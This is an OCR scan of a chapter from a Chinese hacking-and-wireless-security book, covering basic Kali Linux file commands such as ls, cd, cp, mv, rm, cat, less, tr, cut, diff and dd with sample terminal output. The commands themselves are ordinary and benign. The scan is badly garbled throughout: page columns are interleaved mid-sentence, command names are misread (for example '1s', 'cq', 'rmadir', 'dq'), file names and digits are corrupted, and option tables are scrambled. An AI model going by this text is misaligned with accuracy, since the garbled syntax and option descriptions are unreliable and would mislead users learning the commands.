统 中 常用 的 一 些 命 令 ， 掌 握 这 些 命令 的 使 
用 方法 ， 可 以 帮助 用 户 提高 使 用 Kali Linux 
操作 系统 的 能 力 。Kali Linux 管 理 文件 和 目 
录 的 命令 见 下 表 。 


4.2 


表 Kali Linux 管 理 文件 和 目录 的 命令 


显示 目前 的 目录 列 出 目录 
cd | 切换 目录 中 | 复制 文件 或 目录 
mkdir | 创建 一 个 新 的 目录 | 移动 文件 或 目录 


移 除 文件 或 目录 


4.2.1 ls 


ls 命令 用 来 查看 目录 的 内 容 。 语 法 格式 如 下 : 


删除 一 个 空 的 目录 


SS 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


1s 选 项 [-ald] [文件 或 目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 Is 命令 参数 介绍 


选 项 含 文 
-a 显示 目录 中 的 全 部 文件 ， 包 括 隐藏 文件 
-1 显示 目录 中 的 细节 ， 包 括 权限 、 所 有 者 、 组 群 、 大 小 、 创 建 日 期 、 文 件 是 否 是 链接 等 
工 从 后 向 前 依次 列 出 目录 中 内 容 
- 将 文件 依 建 立时 间 的 先后 次 序列 出 
f 显示 列 出 文件 的 文件 类 型 
<- 按照 文件 的 大 小 排序 文件 
-R 该 选项 以 递归 方式 列 出 当前 目录 下 所 有 子 目 录 内 的 内 容 
也 以 可 读 的 方式 显示 文件 的 大 小 ， 如 用 K、M、G 作 单位 


例如 : 使 用 ls -al 命令 ， 来 显示 目录 中 例如 : 使 用 mkdir -p 创 建 一 个 名 称 为 
全 部 文件 的 详细 信息 ， 下 图 为 执行 效果 ， ”test/001 test/002 的 递归 目录 ， 这 里 输入 的 创 
这 里 截取 了 部 分 文件 信息 ， 其 中 ， 左 侧 显 ” 建 命令 如 下 : 
示 的 是 目录 或 文件 的 权限 信息 ， 第 一 个 root 
是 文件 的 所 有 者 信息 ， 第 二 个 root 是 文件 的 


mkdir -p test/001 test/002 


按 Enter 键 ， 下 图 为 执行 效果 。 


所 有 者 所 在 的 所 属 组 信息 。 | 
Footekali:-# mkdir -p test/001 test7662 
Foot@kali: -六 Us -BT root@kali:~# ls 
入 用 量 394 pesktop Downloads Pictures Templates Test 


Hrwar-xr-x 29 root root 4996 10 月 29 22;13 


Hrwr-xr-x 20 root root 36864 10 月 27 21:30 [se PR een 
rw- 1 root root 39728 10 月 36 63:95 -bash_history| Featgkatis -13 tast 
18 c Bel 992 


4.2.3 rmdir 


rmadir 用 于 删除 空 目录 。 命 令 格式 
如 下 : 


Hrwx 3 root root 4996 5 月 


4.2.2 mkdir rmdir [目录 名 ] 
和 mkdir 命 令 用 来 建立 目录 ， 目 录 名 称 需 例如 : 这 里 删除 一 个 名 称 为 001 空 目 
要 使 用 参数 给 定 。 语 法 格式 如 下 : 录 ， 这 里 输入 的 删除 空 目录 命令 如 下 ， 
mkdir -p [目录 名 ] rmdir 001 
其 中 ， 参 数 -p 表 示 递 归 创建 目录 。 按 Enter 键 ， 下 图 为 执行 效果 。 
例如 : 使 用 mkdir 命 令 创 建 一 个 名 称 为 de ey cd test 
temp 的 目录 ， 输 入 的 创建 命令 如 下 : pel 002 
root@kali:~/test# rmdir 991 
mkdir temp root@kali:~/test# ls 
Be2 
按 Enter 键 ， 下 图 为 执行 效果 。 
ee IE 和 i ee 4.2.4 cd 
Re cd 命令 用 于 切换 当前 工作 目录 至 


oot@kali:-# ls 


Documents Music Public Templates Videod - < 一 
和 dirName (目录 参数 ) 。 其 中 dirName 表 示 
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法 可 为 绝对 路 径 或 相对 路 径 。 若 目录 名 称 
省 略 ， 则 变换 至 使 用 者 的 home 目 录 ， 也 就 
是 刚 登 录 时 所 在 的 目录 。 命 令 格式 如 下 : 

cq [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”cd 命令 参数 介绍 

选 项 含 义 

~ 表示 为 home 目 录 
表示 目前 所 在 的 目录 
表示 目前 目录 位 置 的 上 一 层 目 录 


如 果 要 切换 到 的 目标 目录 是 一 个 符号 链 
了 了 | 接 ， 直 接 切 换 到 符号 链接 指向 的 目标 目录 


如 果 要 切换 的 目标 目录 是 一 个 符号 的 链 
工 接 ， 直 接 切换 到 字符 链接 名 代表 的 目录 ， 
而 非 符号 链接 所 指向 的 目标 目录 


当 仅 使 用 “-” 一 个 选项 时 ， 当 前 工作 目 
录 将 被 切换 到 环境 变量 OLDPWD 所 表示 的 
目录 

使 用 cd 加 上 目录 名 称 可 以 切换 到 相应 
的 目录 ， 例 如 : 使 用 cd ~ 可 以 切换 到 当前 用 
户 的 主 目录 ， 如 下 图 所 示 。 


ee ¥ pud 


Foctekaus: ~# Cd pr 
roor ot@kali: /homez# 

Fe Ad 
Lroo 


如 果 使 用 cd 加 上 绝对 路 径 可 以 直接 切 
换 到 相应 的 目录 ， 每 加 入 “..” 可 以 退出 一 
层 ， 如 下 图 所 示 。 


emt /# cd /usr/share/john 
‘oot@kali: /usr/share/john# cd ../../.| 


4.2.5 pwd 


pwd 命 令 以 绝对 路 径 的 方式 显示 用 户 当 
前 工作 目录 。 命 令 将 当前 目录 的 全 路 径 名 
称 ( 从 根 目录 ) 写 入 标准 输出 。 全 部 目录 
使 用 “/” 分 隔 。 第 一 个 /表示 根 目 录 ， 最 后 
一 个 目录 是 当前 目录 。 执 行 pwd 命 令 可 立刻 
获取 当前 用 户 所 在 的 工作 目录 的 绝对 路 径 
名 称 。 命 令 格式 如 下 : 


pwd 


例如 : 使 用 pwd 命 令 ， 可 以 显示 出 当前 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 SEE 


目录 ， 该 命令 比较 简单 也 没有 选项 ， 下 图 
为 运行 命令 后 的 显示 结果 。 


Iroot@kali:-~# Ls 

besktop Downloads Pictures 
pocuments Music 
Iroot@kali:-# pwd 


Templates Test 
Public test Videos 


侈 提示 : 为 了 区 分 目录 信息 ， 可 以 先 使 用 ls 
列 出 目 录 信 息 。 


4.2.6 cp 
cp 命令 主要 用 于 复制 文件 或 目录 。 命 画 
令 语法 格式 如 下 : 
cp -rp [原文 件 或 目录 ] [目标 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 cp 命令 参数 介绍 
含 义 


此 选项 通常 在 复制 目录 时 使 用 ， 它 保留 
链接 、 文 件 属性 ， 并 复制 目录 下 的 所 有 
内 容 。 其 作用 等 于 dpR 选 项 组 合 


复制 时 保留 链接 。 这 里 所 说 的 链接 相当 
于 Windows 系 统 中 的 快捷 方式 


覆盖 已 经 存在 的 目标 文件 而 不 给 出 提示 


与 -选项 相反 ， 在 覆盖 目标 文件 之 前 给 出 
提示 ， 要 求 用 户 确认 是 否 覆 盖 ， 回 答 y 时 
目标 文件 将 被 覆盖 


除 复制 文件 的 内 容 外 ， 还 把 修改 时 间 和 
访问 权限 也 复制 到 新 文件 中 


若 给 出 的 源 文 件 是 一 个 目录 文件 ， 此 时 
将 复制 该 目录 下 所 有 的 子 目 录 和 文件 


不 复制 文件 ， 只 是 生成 链接 文件 


例如 ; 使 用 cp 命令 加 -r 选 项 复制 目录 到 
指定 目录 ， 下 图 为 执行 效果 。 


t 
和 

Ekali:-# cp -r Test temp 

ee #1s temp 


例如 : 使 用 cp 命令 ,复制 文件 到 目 
录 ， 下 图 为 执行 效果 。 
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pictures temp Test 
Public Templates Videos 


mv 命令 用 来 对 文件 或 目录 重新 命名 ， 
或 者 将 文件 从 一 个 目录 移 到 另 一 个 目录 
中 。source 表 示 源 文件 或 目录 ，target 表 示 目 
标 文件 或 目录 。 如 果 将 一 个 文件 移 到 一 个 
已 经 存在 的 目标 文件 中 ， 则 目标 文件 的 内 
容 将 被 覆盖 。 命 令 语 法 格式 如 下 : 

mv [原文 件 或 目录 ] [目标 目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 mv 命令 参数 介绍 


若 指定 目录 已 有 同名 文件 ， 则 先 询问 是 
否 覆 盖 旧 文件 
在 mv 操作 要 覆盖 某 已 有 的 目标 文件 时 不 
给 任何 指示 


使 用 mv 命令 将 源 文件 被 移 至 目标 文件 
有 以 下 两 种 不 同 的 结果 : 

e 如 果 目 标 文件 是 到 某 一 目录 文件 的 
路 径 ， 源 文件 会 被 移 到 此 目录 下 ， 
且 文 件 名 不 变 。 如 果 目 标 文件 不 是 
目录 文件 ， 则 源 文件 名 (只 能 有 一 
个 ) 会 变 为 此 目标 文件 名 ， 并 覆盖 
已 经 存在 的 同名 文件 。 

e 如 果 源 文件 和 目标 文件 在 同一 个 目 
录 下 ，mv 的 作用 就 是 改 文件 名 。 当 
目标 文件 是 目录 文件 时 ， 源 文件 或 
目录 参数 可 以 有 多 个 ， 则 所 有 的 源 
文件 都 会 被 移 至 目标 文件 中 。 所 有 
移 到 该 目录 下 的 文件 都 将 保留 以 前 
的 文件 名 。 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


和 略 注 意 : mv 命令 与 cp 命令 的 执行 效果 不 
同 ，mv 的 作用 是 剪 切 ， 文 件 个 数 并 未 增 
加 。 而 cp 对 文件 进行 复制 ， 文 件 个 数 增 
加 了 。 


mv 命令 ， 将 其 中 一 个 目录 前 切 走 ， 下 图 为 
运行 效果 。 


root@kali:~# TS test 

pez 

rootekati:-# ls Test 

R 3 4 port Service test 
root@kali:-# mv test/992 Test 
root@kali:-# ls Test 

Be2 2 3 4 port Service test 
root@kali:-# ls test 

Iroot@kali:# 


例如 使 用 mv 命令 对 文件 进行 重合 
名 ， 下 图 为 执行 效果 。 


[root@kali:~/temp# Us 
B81l.txt Test | 
Iroot@kali:~/temp# mv 991.txt 0602.txt 
root@kali:~/temp# ls | 
B92.txt Test 


4.2.8 rm 


rm 命令 用 于 删除 一 个 文件 或 者 目录 。 
命令 语法 格式 如 下 

rm - 王 [文件 或 目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 
表 rm 命令 参数 介绍 

含 义 

删除 前 逐一 询问 确认 
即使 源 文件 为 只 读 属性 ， 也 直接 删除 ， 
不 确认 
将 目录 及 以 下 文件 递归 删除 


例如 : 使 用 mm 命令 加 上 -i 选 项 ， 在 删除 
文件 时 会 进行 询问 ， 下 图 为 执行 效果 。 

root@kali:~/temp# touch 6001.txt 

root@kali:~/temp# LS 

B81.txt Test 

root@kali:~/temp# rm -i 991.txt 

rm: 是 否 删除 普通 空 文件 '991.txt' ? y 

root@kali:~/temp# ls 

Test 

例如 : 如 果 使 用 rm 命令 -r 选 项 会 递归 
删除 ， 该 命令 初学 者 使 用 时 需要 慎重 ， 否 
则 可 能 误 删除 比较 重要 的 文件 导致 系统 崩 
溃 ， 下 图 为 递归 删除 目录 的 执行 效果 。 


root@kali:~# mv Test7667 test 
root@kali:~# rm test 
rm: 无 法 删除 'test': 是 一 个 目录 


root@kali:-~# rm -r test 

Iroot@kali:-# ls 

Desktop Documents Downloads Music Pictures 
Public Templates Test Videos 


例如 : 首先 查看 两 个 目录 ， 然 后 使 用 
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4.3 ”文件 内 容 查 看 命令 


文件 内 容 查 看 命令 可 以 方便 对 文件 内 
容 进行 查看 ，Kali Linux 给 出 了 丰富 的 文件 
查看 命令 ， 通 过 这 些 命令 可 以 快速 地 查看 
想 要 的 文件 信息 。Kali Linux 中 文件 内 容 查 
看 命令 见 下 表 。 
表 Kali Linux 中 文件 查看 命令 


命 令 功 能 

cat 由 第 一 行 开始 显示 文件 内 容 

tac 从 最 后 一 行 开始 显示 ， 与 cat 功 能 相反 
nl 显示 内 容 时 ， 输 出 内 容 的 行 号 

more 一 页 一 页 地 显示 文件 内 容 

head 只 看 头 几 行 

tail 只 看 末尾 几 行 

less 与 more 类 似 ， 但 可 以 往 前 翻 页 
4.3.1 cat 


cat 命 令 用 于 连接 文件 并 打印 到 标准 输 
出 设备 上 ，Kali Linux 系 统 中 有 多 个 用 于 查 
看 文本 内 容 的 命令 ， 每 个 命令 都 有 自己 的 特 
点 ， 例 如 : 这 个 cat 命 令 就 是 用 于 查看 内 容 
较 少 的 纯 文本 文件 的 。 命 令 语法 格式 如 下 : 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ES 


root@kali:-# cat -n /etc/issue 
1 Kali GNU/Linux Rolling \n \U 
2 


root@kali:~# cat /etc/issue 
Kali GNU/Linux Rolling nn \L 


4.3.2 tac 


tac 与 cat 命 令 刚 好 相反 ， 文 件 内 容 从 E 
最 后 一 行 开始 显示 ， 可 以 看 出 tac 是 cat 的 
倒 着 写 。 

tac [-AbEnTv] [文件 名 ] 

为 了 对 比 tac 与 cat 命 令 的 区 别 ， 这 里 使 
用 tac 命 令 查 看 与 cat 命 令 一 样 的 文件 ， 下 图 为 
执行 效果 ， 可 以 看 到 cat 显 示 一 行文 本 一 行 空 
白 ，tac 先 显示 一 行 空白 再 显示 文本 。 


Foot@kali: -~# cat /etc/issue 
Kali GNU/Linux Rolling \n \1 


root@kali:-# tac /etc/issue 


Kali GNU/Linux Rolling \n NA1 


4.3.3 more i 
[DE 


使 用 more 命 令 可 以 一 页 一 页 地 翻 看 文 上 
本 内 容 ， 并 在 最 下 面 使 用 百分比 的 形式 来 8 
提示 已 经 阅读 了 多 少 内 容 。 命 令 语法 格式 中 
如 下 : 


cat [-AbEnTv] [文件 名 ] more [-dlfpcsu] [-num] [+/pattern] 
命令 中 选项 的 参数 介绍 见 下 表 ee 
ff 选项 的 参 绍 见 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”cat 命令 参数 介绍 
表 more 命 令 参数 介绍 
选 项 含 义 
含 义 
i 相当 于 -vET 的 整合 选项 ， 可 列 出 一 些 特 一 一 
殊 字符 而 不 是 空白 而 已 从 第 n 行 开始 显示 
列 出 行 号 ， 仅 针对 非 空白 行 作 行 号 显 定义 屏幕 大 小 为" 行 
示 ， 空 白 行 不 标 行 号 在 每 个 档案 显示 前 搜寻 该 字 捉 (pat- 
和 tem) ， 然 后 从 该 字 串 前 两 行 之 后 开始 显示 
部 清 屏 ， 然 后 显示 
列 印 出 行 号 ， 连 同 空白 行 也 会 有 行 号 ， lit 和 大 
与 -b 的 选项 不 同 提示 按 空格 键 继续 ， 按 Q 键 退出 ， 禁 用 响 
T 将 Tab 按 键 以 显示 出 来 的 
- - 忽略 ClHL ( 换 页 ) 字符 
二 一 些 : 下 站 
> 下 同和 而 相当 的 多 汶 字 特 通过 清除 窗口 而 不 是 滚屏 来 对 文件 进行 换 


这 个 命令 比较 简单 用 于 显示 内 容 ， 加 
入 -选项 可 以 实现 带 行 号 输出 ， 右 上 图 为 运 


行 实例 。 


页 ， 与 -选项 相似 
把 连续 的 多 个 空 行 显示 为 一 行 
把 文件 内 容 中 的 下 画 线 去 掉 
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例如 : 使 用 more 命 令 查看 文本 全 部 内 
容 ， 下 图 为 执行 效果 。 


了 


officiatty 
or a deblan package， 
sd mumbers please install the mmap package 


# TCP port service multiplexer 


表 less 命 令 参 数 介绍 
选 项 含 义 
-b < 缓冲 区 大 小 > | 设置 缓冲 区 的 大 小 


-© 


本 


当 文件 显示 结束 后 ， 自 动 离开 


强迫 打开 特殊 文件 ， 例 如 外 围 设 
备 代 号 、 目 录 和 二 进 制 文件 


< 只 标志 最 后 搜索 的 关键 词 
忽略 搜索 时 的 大 小 写 
A 
一 般 情况 下 ， 一 页 并 不 能 显示 文本 。 下 Re 
的 全 部 内 容 ， 这 时 就 可 以 使 用 下 面 的 按键 a 
来 查看 未 显示 的 内 容 ， 常 用 的 按键 说 明 见 -< 文件 名 > | 交办 出 的 内 容 在 指定 文件 中 保 
下 表 。 
RR 业 . 
表 常用 的 按键 说 明 by id 
显示 连续 空 行为 一 行 
按键 功 能 
-8 行 过 长 时 间 将 超出 部 分 合 弃 
空白 键 (space) | 代表 向 下 翻 一 页 
六 < 数字 > 将 tab 键 显示 为 规定 的 数字 空格 
Enter 代表 向 下 翻 一 行 
/字符 串 向 下 搜索 “字符 串 ” 的 功能 
代表 在 这 个 显示 的 内 容 当中 ， 向 下 er 
/ 字 串 入 二 让 二 二 不 于 邱 本 ?字符 中 向 上 搜索 “字符 串 ” 的 功能 
一 一 n 重复 前 一 个 搜索 
4 立刻 显示 出 文件 名 以 及 目前 显示 的 
: 行 数 N 反 向 重复 前 一 个 搜索 
CultF 向 下 滚动 一 屏 b 向 后 翻 一 页 
= 输出 当前 行 的 行 号 d 向 后 翻 半 页 
v 调用 vi 编辑 器 E 显示 生 助 界面 
退出 I 
! 命 令 调用 Shell， 并 执行 命令 a A 
u 向 前 滚动 半 页 
Q 退出 more， 不 再 显示 该 文件 内 容 
y 向 前 滚动 一 行 
4.3.4 less 空格 键 滚动 一 页 
less 与 more 类 似 ， 但 使 用 less 可 以 随意 Enter 键 滚动 一 行 
浏览 文件 ， 而 more 仅 能 向 前 移动 ， 却 不 能 PageDown 向 下 翻动 一 页 
_- Rs 
向 后 移动 ， 而 且 less 在 查看 之 前 不 会 加 载 整 ”i 和 


个 文件 。 命 令 语法 格式 如 下 : 
[文件 名 ] 
命令 中 选项 的 参数 介绍 见 右 表 。 


less 
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执行 效果 。 


例如 : 使 用 less 查 看 文本 内 容 ， 下 图 为 
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T7EEF ICP po 


Service muttprezen 


18/tcp # nessage send protocol 


22/tcp # SSH Renote Login Protocol 


4.3.5 head 


head 命 令 用 于 查看 纯 文本 文档 的 前 n 
行 ， 命令 语法 格式 如 下 : 
[文件 名 ] 


命令 中 选项 的 参数 为 -n， 用 于 指定 
行 数 。 

使 用 该 命令 可 以 设 定 显示 部 分 内 容 ， 
内 容 从 头 开始 -n 选 项 指定 截止 行 数 ， 例 如 ; 
查看 一 个 文本 的 前 5 行 ， 运 行 head 命 令 ， 下 
图 为 执行 效果 。 


head 


4.3.6 tail 


tail 命 令 用 于 查看 文本 末尾 内 容 ， 与 
head 命 令 正好 相反 ， 命 令 语法 格式 如 下 : 
[文件 名 ] 

命令 中 选项 的 参数 为 -n 与 -f， 其 中 -n 用 
于 指定 行 数 ，-f 动 态 显示 文件 末尾 内 容 。 

tail 命 令 多 用 于 查看 日 志文 件 ， 因 为 日 
志文 件 是 变动 的 且 日 志 都 依次 从 尾部 加 入 ， 
例如 : 运行 tail -n 5 /etc/services 命 令 来 查看 文 
件 末 尾 内 容 ， 下 图 为 执行 效果 。 


FootekalL# tall -TS Jete/services 
dircproxy 57089/tcp # Detachable IRC proxy 
Ktfido 69177/tcp # fidonet EMSI over tetnet 
69179/tcp # fidonet EMSI over TCP 


tail 


4.4 其 他 文件 操作 命令 


除了 查看 文件 内 容 命令 外 ，Kali Linux 
还 提供 了 一 些 其 他 的 文件 操作 命令 ， 使 用 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


这 些 命令 可 以 过 滤 转 化 文本 中 的 字符 。Kali 
Linux 中 其 他 文件 操作 命令 见 下 表 。 
表 Kali Linux 中 其 他 文件 操作 命令 


命 令 功 能 

t 转换 或 删除 文件 中 的 字符 

we 统计 文本 的 行 数 、 字 数 、 字 节 数 等 
dif 比较 文件 的 差异 

file 查看 文件 类 型 

cut 截取 文本 中 想 要 的 内 容 

stat 查看 文件 的 存储 信息 和 时 间 等 信息 
dd 读 取 、 转 换 并 输出 数据 
4.4.1 tr 


Kali Linux 系 统 中 的 tr 命令 用 于 转换 或 剖 


删除 文件 中 的 字符 ，tr 指 令 从 标准 输入 设备 
读 取 数 据 ， 经 过 字符 串 转译 后 ， 将 结果 输 
出 到 标准 输出 设备 。 命 令 语法 格式 如 下 : 

tr [-cdst][--help][--version] [第 一 字 


符 集 ] [第 二 字符 集 ] 
tr [OPTION]***SET1 [SET2] 


命令 中 选项 的 参数 介绍 见 下 表 。 

表 tr 命令 参数 介绍 

选 含 义 

Ee 反选 设 定 的 字符 

-d 删除 指令 字符 

-Ss 缩减 连续 重复 的 字符 成 指定 的 单个 字符 

有 削减 SET1 指 定 范围 ， 使 之 与 SET2 设 定 
长 度 相等 

--help 显示 程序 用 法 信息 


一 Version 


显示 程序 本 身 的 版 本 信息 


有 时 想 要 快速 地 替换 文本 中 的 一 些 词 
汇 ， 又 或 者 把 整个 文本 内 容 都 进行 蔡 换 ， 
如 果 进 行 手工 替换 工作 量 太 大 。 这 时 就 可 
以 先 使 用 cat 命 令 读 取 待 处 理 的 文本 ， 然 后 
通过 管道 符 “|”， 把 这 些 文本 内 容 传递 给 tr 
命令 ,最 后 进行 蔡 换 操作 即 可 。 

例如 : 使 用 tr 对 文本 内 容 进行 大 小 写 转 
换 ， 下 图 为 命令 执行 效果 。 
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root@kali:~/temp# vi O001.txt 
root@kali:~/temp# cat 001.txt 

hello linux 

root@kali:~/temp# cat 001.txt | tr a-z A-Z 
HELLO LINUX 


4.4.2 Wc 


中 Kali Linux 系 统 中 的 wc 命 令 用 于 统计 文 
本 的 行 数 、 字 数 、 字 节 数 等 。 命 令 语法 格 


式 如 下 : 
wc [-clw] [--help] [--version] [文件 ...] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参 数 介绍 
选 项 含 义 
< 只 显示 Bytes 数 
-| 只 显示 行 数 
-WwW 只 显示 字数 


例如 : 使 用 wc 命令 查看 文本 中 的 行 数 
字数 ， 下 图 为 命令 执行 效果 。 

en /tenp# cat O61.txt | we -d 

root@kali:~/temp# cat 991.txt |wc -\ 


1 
root@kali:~/temp# cat 6991.txt |wc -w 


浊 4.4.3 cut 


6 在 Kali Linux 系 统 中 ， 如 何 准 确 地 提 

因 取 出 最 想 要 的 数据 ， 这 也 是 用 户 应 该 重点 

学 习 的 内 容 。 一 般 情况 下 ， 按 基于 “ 行 ” 

“的 方式 来 提取 数据 是 比较 简单 的 ， 只 要 
设置 好 要 搜索 的 关键 词 即 可 。 但 是 如 果 按 
“ 列 ” 搜 索 文本 ， 不 仅 要 使 用 -f 选 项 来 设 
置 需要 看 的 列 数 ， 还 需要 使 用 -d 选 项 来 设 
置 间隔 符号 。 不 过 ， 使 用 cut 命 令 则 可 以 快 
速 截取 文本 中 想 要 的 内 容 。 命 令 语法 格式 
如 下 : 

cut [-bn] [file] 


cut [=el [fiel 
cut [-df] [file] 


命令 中 选项 的 参数 介绍 见 下 表 。 


和 2 


表 trs 命 令 参数 介绍 


选 项 含义 
b 以 字 节 为 单位 进行 分 割 
< 以 字符 为 单位 进行 分 割 
-d 自 定义 分 隔 符 ， 默 认为 制 表 符 
f 与 -d 一 起 使 用 ， 指 定 显示 哪个 区 域 
1 取消 分 割 多 字 节 字符 


移 提 示 : cut 命 令 从 文件 的 每 一 行 剪 切 字 
节 、 字 符 和 字段 并 将 这 些 字 节 、 字 符 和 字 
段 写 至 标准 输出 。 如 果 不 指 定 文件 参数 ， 
cut 命 令 将 读 取 标 准 输入 ， 不 过 ， 必 须 指 
定 -b、-c 或 -f 标 志 之 一 。 


例如 : 使 用 cut 截 取 部 分 内 容 进 行 显 
示 ， 下 图 为 命令 执行 效果 。 


root@Kkali:~/temp# cat O01.txt 
B01:xiaoming:75:39:55:60 
902:zhangsan:80:99:190:88 
root@kali:~/temp# cut -d":" -f2 601.txt 
xiaoming 

zhangsan 


例如 : 使 用 cat 读 取 文 件 再 使 用 cut 进 行 
截取 某 段 内 容 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat O01.txt 
B601:xiaoming:75:30:55:60 
662:zhangsan:89:96:169:88 | 
root@kali:~/temp# cat 691.txt | cut -d":" -f3,4 
175:30 | 
86:99 


4.4.4 stat 


Kali Linux 系 统 中 的 stat 命 令 可 以 用 于 查看 
文件 的 存储 信息 和 时 间 等 信息 ， 会 显示 出 文 
件 的 三 种 时 间 状 态 : 最 近 访 问 (Access) 、 
更 改 (Modify) 、 改 动 (Change) 。 命 令 
语法 格式 如 下 : 

stat [文件 或 目录 ] 


例如 : 使 用 stat 可 以 查看 文件 详细 时 
间 ， 下 图 为 命令 执行 效果 。 


决 :8 0 
Inode : 3548922 。。 硬 链 接 
( 6/ root) Gid:( 8/ 


决 ; 4996 。 益 通 文件 
3 二 
root 
984536107 -8486 


7:37.848539246 -8488 
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4.4.5 diff 


Kali Linux 系 统 中 的 di 全 命令 用 于 比较 文件 的 差异 ，dif 以 逐 行 的 方式 ， 比 较 文 本 文件 的 
异同 处 ， 如 果 指 定 要 比较 目录 ， 则 diff 会 比较 目录 中 相同 文件 名 的 文件 ， 但 不 会 比较 其 中 
的 子 目 录 。 命 令 语法 格式 如 下 : 
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diff [选项 ] 文件 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 diff 命 令 参数 介绍 
选 项 含义 

-< 行 数 > 指定 要 显示 多 少 行 的 文本 。 此 参数 必须 与 -或 -u 参 数 一 并 使 用 
-a 或 --text di 他 预 设 只 会 逐 行 比较 文本 文件 
-b 或 --ignore-space-change 不 检查 空格 字符 的 不 同 
-B 或 --ignore-blank-lines 不 检查 空白 行 


< 
-C< 行 数 > 或 --context< 行 数 > 

-d 或 --minimal 

-D< 巨 集 名称 > 或 ifdef< 巨 集 名 称 > 
-e 或 -ed 

- 域 -forward-ed 


-H 或 --speed-large-files 


-1< 字 符 或 字符 串 > 或 --ignore-matching- 


显示 全 部 内 文 ， 并 标 出 不 同 之 处 

与 执行 “-c-< 行 数 >” 指 令 相同 

使 用 不 同 的 演算 法 ， 以 较 小 的 单位 来 做 比较 

此 参数 的 输出 格式 可 用 于 前 置 处 理 器 巨 集 

此 参数 的 输出 格式 可 用 于 ed 的 script 文 件 

输出 的 格式 类 似 ed 的 script 文 件 ， 但 按照 原来 文件 的 顺序 来 显示 不 同 处 
比较 大 文件 时 ， 可 加 快速 度 

若 两 个 文件 在 某 几 行 有 所 不 同 ， 而 这 几 行 同时 都 包含 了 选项 中 指定 的 


lines< 字 符 或 字符 串 > 字符 或 字符 串 ， 则 不 显示 这 两 个 文件 的 差异 

-i 或 --ignore-case 不 检查 大 小 写 的 不 同 

-| 或 --paginate 将 结果 交 由 pr 程序 来 分 页 

-0 或 --rcs 将 比较 结果 以 RCS 的 格式 来 显示 

-N 或 -new-fle 在 比较 目录 时 ， 若 文件 A 仅 出 现在 某 个 目录 中 ， 预 设 会 显示 
Only in 目 录 文件 A 若 使 用 -N 参 数 ， 则 diff 会 将 文件 A 与 一 个 空白 的 文件 比较 


Pp: 


若 比 较 的 文件 为 C 语 言 的 程序 码 文件 时 ， 显 示 差 异 所 在 的 函数 名 称 


-P 或 --unidirectional-new-file 


-q 或 --brief 


-I 或 --recursive 


与 -N 类 似 ， 但 只 有 当 第 二 个 目录 包含 了 一 个 第 一 个 目录 所 没有 的 文件 
时 ， 才 会 将 这 个 文件 与 空白 的 文件 做 比较 


仅 显示 有 无 差异 ， 不 显示 详细 的 信息 
比较 子 目 录 中 的 文件 


-s 或 --report-identical-files 


若 没有 发 现任 何 差异 ， 仍 然 显示 信息 


-S< 文 件 > 或 --starting-fle< 文 件 > 


在 比较 目录 时 ， 从 指定 的 文件 开始 比较 


-t 或 --expand-tabs 


在 输出 时 ， 将 tab 字 符 展开 
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续 表 
选 项 含 义 

-T 或 --initial-tab 在 每 行 前 面 加 上 tab 字 符 以 便 对 齐 
-0.-U< 列 数 > 或 --unified=< 列 数 > 以 合并 的 方式 来 显示 文件 内 容 的 不 同 
-Vv 或 --version 显示 版 本 信息 
-Ww 或 --ignore-all-space 忽略 全 部 的 空格 字符 
-W< 宽 度 > 或 --width< 宽 度 > 在 使 用 -y 参 数 时 ， 指 定 栏 宽 
ee 不 比较 选项 中 所 指定 的 文件 或 目录 
ee i 目录 类 型 存 成 文本 文件 ， 然 后 在 =< 文 件 > 中 指定 此 文本 
-y 或 --side-by-side 以 并 列 的 方式 显示 文件 的 异同 之 处 
--help 显示 帮助 

在 使 用 -y 参 数 时 ， 若 两 个 文件 某 一 行内 容 相同 ， 则 仅 在 左 侧 的 栏 位 显示 
--left-column 


该 行内 容 


--suppress-common-lines 


例如 : 使 用 diff 只 比较 两 个 文件 是 否 存 
在 差异 ， 下 图 为 命令 执行 效果 。 


[Foot@kali: ~/temp# cat a.txt 
hello linux 


8123456789 

Iroot@kali:~/temp# cat b.txt 

ello Linux 

9876543219 

Iroot@kali:~/temp# diff --brief a.txt b.txt 


件 a.txt 和 _b,txt 不 同 


例如 : 使 用 diff 比 较 两 个 文件 并 打印 出 
不 同 部 分 ， 下 图 为 命令 执行 效果 。 


Foot@kali: 
|** a.txt 
上- b.txt 
| 
rr 1,2 w+ 


temp# diff -c a.txt b.txt 
2918-11-91 95:28:29.521628618 -0499 
2918-11-91 95:28:54.396922947 -049g 


hello linux 
! 0123456789 
-1,2 ---- 

hello linux 
由 9876543216 


渴 4.4.6 dd 


Kali Linux 系 统 中 的 dd 命令 用 于 读 取 、 

加 转换 并 输出 数据 ，dd 可 从 标准 输入 或 文件 

中 读 取 数据 ， 根 据 指定 的 格式 来 转换 数 

” 据 ， 再 输出 到 文件 、 设 备 或 标准 输出 。 命 
令 语法 格式 如 下 : 


dq [选项 ] 
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在 使 用 -y 参 数 时 ， 仅 显示 不 同 之 处 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 dd 命令 参数 介绍 
选 项 含义 
if-file 从 file 中 读 而 不 是 标准 输入 
写 到 file 里 去 而 不 是 标准 输出 。 除 非 指定 
of-file conv=notrunc， 否 则 dd 将 把 file 截 为 0 字 节 
(或 由 seek= 选 项 指定 的 大 小 ) 
和 一 次 读 和 写 bytes 字 节 。 这 将 覆盖 ibs 和 obs 
设 定 的 值 
Count 设置 要 复制 块 的 个 数 


例如 : 使 用 dd 命令 从 /dev/zero 设 备 文件 
中 取出 一 个 大 小 为 560MB 的 数据 块 ， 然 后 保 
存 成 名 为 560_file 的 文件 ， 下 图 为 执行 效果 。 


